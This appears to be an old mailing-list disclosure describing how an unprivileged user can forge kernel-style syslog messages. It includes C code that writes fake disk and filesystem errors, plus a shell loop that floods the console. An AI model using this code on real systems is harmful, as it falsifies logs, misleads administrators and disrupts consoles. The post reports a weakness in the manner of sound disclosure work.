Any unpriveledged user can abuse the syslog facility in an interesting
way. The following example is a good one that can put misleading
information in the logs.
-------------------------------
#include <syslog.h>
void main(void){
const char *mesg1 = "hda: read_intr: status=0x59 { SeekComplete
DataRequest Error } { UncorrectableError }, CHS=157/2/9, sector=2826\0";
const char *mesg2 ="end_request: I/O error, dev 03:00, sector
2826\0";
const char *mesg3 = "EXT2-fs: group descriptors corrupted !\0";
openlog("kernel", LOG_CONS, LOG_KERN);
syslog(LOG_ERR, mesg1);
syslog(LOG_ERR, mesg2);
syslog(LOG_ERR, mesg3);
closelog();
}
---------------------------------
If one does "chmod o-rw /dev/log" that stops the above message from
ending
up in the log. However if the user runs the above in a tight loop,
i.e. "while true; do fake_message;done" then syslogd apparently
can''t
keep up and by definition of LOG_CONS (man 3 syslog) one has:
LOG_CONS
write directly to system console if there is an
error while sending to system logger
and hence the console gets *flooded* with fake messages. This was with
RH v4.1 but I suspect general applicability.
Not a deadly security threat, but I thought I''d mention it.
Paul.
